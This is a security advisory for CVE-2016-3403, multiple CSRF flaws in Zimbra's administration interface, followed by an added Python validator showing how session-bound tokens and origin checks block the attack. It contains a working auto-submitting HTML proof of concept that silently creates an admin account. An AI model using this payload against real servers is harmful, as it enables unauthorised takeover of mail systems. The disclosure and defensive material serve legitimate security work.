| Title | Published | Views | Family (all 7) |
|---|---|---|---|
| Multiple Cross-Site Request Forgery Vulnerabilities in Zimbra | 13 Jan 2017 00:00 | – | cnvd |
| CVE-2016-3403 | 17 May 2017 14:00 | – | cve |
| CVE-2016-3403 | 17 May 2017 14:00 | – | cvelist |
| EUVD-2016-4429 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2016-3403 | 17 May 2017 14:29 | – | nvd |
| CVE-2016-3403 | 17 May 2017 14:29 | – | osv |
| Cross site request forgery (csrf) | 17 May 2017 14:29 | – | prion |
# CVE-2016-3403: Multiple CSRF in Zimbra Administration interface
## Description
Multiple CSRF vulnerabilities have been found in the administration
interface of Zimbra. They allow an attacker to, among other things, add,
modify and remove admin accounts on behalf of a logged-in administrator.
## Vulnerability
Every form in the Administration part of Zimbra is vulnerable to CSRF
because no CSRF token tied to the valid session is required. As a
consequence, requests can be forged and replayed arbitrarily.
* **Access Vector**: remote
* **Security Risk**: low
* **Vulnerability**: CWE-352
* **CVSS Base score**: 5.8
## Proof of Concept
```html
<html>
<body>
<!-- The browser attaches the victim's admin session cookie automatically;
     enctype="text/plain" sends the input as name=value, so the split
     name/value pair is reassembled into a SOAP CreateAccountRequest body. -->
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
method="POST">
<input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">[email protected]</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'
value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
// Auto-submit as soon as the page loads; no user interaction is needed.
document.forms[0].submit();
</script>
</body>
</html>
```
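As an added example (not Zimbra's code, nor the advisory authors'), the following server-side validator shows why the PoC above succeeds against an endpoint that trusts the session cookie alone, and how requiring a session-bound token, a non-form content type and a same-site Origin rejects it. The `Request` model, the `X-CSRF-Token` header name and both sample requests are assumptions constructed for this example.

```python
import hmac
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Content types a cross-site HTML form can send without a CORS preflight
# (the PoC relies on enctype="text/plain" to ship a SOAP body this way).
FORM_CONTENT_TYPES = {"application/x-www-form-urlencoded",
                      "multipart/form-data", "text/plain"}

@dataclass
class Request:                          # hypothetical request model
    headers: Dict[str, str]
    body: str
    session_csrf_token: Optional[str]   # token the server bound to the session cookie

def is_allowed_admin_request(req: Request, trusted_origin: str) -> Tuple[bool, str]:
    """Return (allowed, reason); each check alone defeats a forged form post."""
    h = {k.lower(): v for k, v in req.headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    # 1. A real SOAP client sends application/soap+xml; an HTML form cannot.
    if not ctype or ctype in FORM_CONTENT_TYPES:
        return False, "form-encodable content type %r" % ctype
    # 2. When the browser supplies Origin/Referer, it must be the admin console.
    source = h.get("origin") or h.get("referer") or ""
    if source and not source.startswith(trusted_origin):
        return False, "cross-site source %r" % source
    # 3. Synchronizer token: the header must match the session-bound token
    #    (the cookie is attached automatically by the browser, the token is not).
    sent = h.get("x-csrf-token", "")
    if not req.session_csrf_token or not hmac.compare_digest(sent, req.session_csrf_token):
        return False, "missing or mismatched CSRF token"
    return True, "ok"

SOAP_BODY = ('<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">'
             '<soap:Body><CreateAccountRequest xmlns="urn:zimbraAdmin"/></soap:Body>'
             '</soap:Envelope>')   # constructed, trimmed stand-in for the PoC body

def forged_request() -> Request:
    # What the browser sends when the PoC page auto-submits: form content type,
    # attacker origin, session cookie attached by the browser, no token header.
    return Request({"Content-Type": "text/plain", "Origin": "http://attacker.example"},
                   SOAP_BODY, session_csrf_token="s3cr3t-token")

def legit_request() -> Request:
    # What the admin console itself sends (constructed values).
    return Request({"Content-Type": "application/soap+xml; charset=utf-8",
                    "Origin": "https://192.168.0.171:7071",
                    "X-CSRF-Token": "s3cr3t-token"},
                   SOAP_BODY, session_csrf_token="s3cr3t-token")
```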
## Solution
* Upgrade to version 8.7
## Affected versions
* All versions previous to 8.7
## Fixes
* https://bugzilla.zimbra.com/show_bug.cgi?id=100885
* https://bugzilla.zimbra.com/show_bug.cgi?id=100899
## Timeline (dd/mm/yyyy)
* 24/02/2016: Issue reported to Zimbra
* 24/02/2016: Issue acknowledged
* 20/06/2016: complete fixes released with version 8.7
## Credits
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail -dot- fr)
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)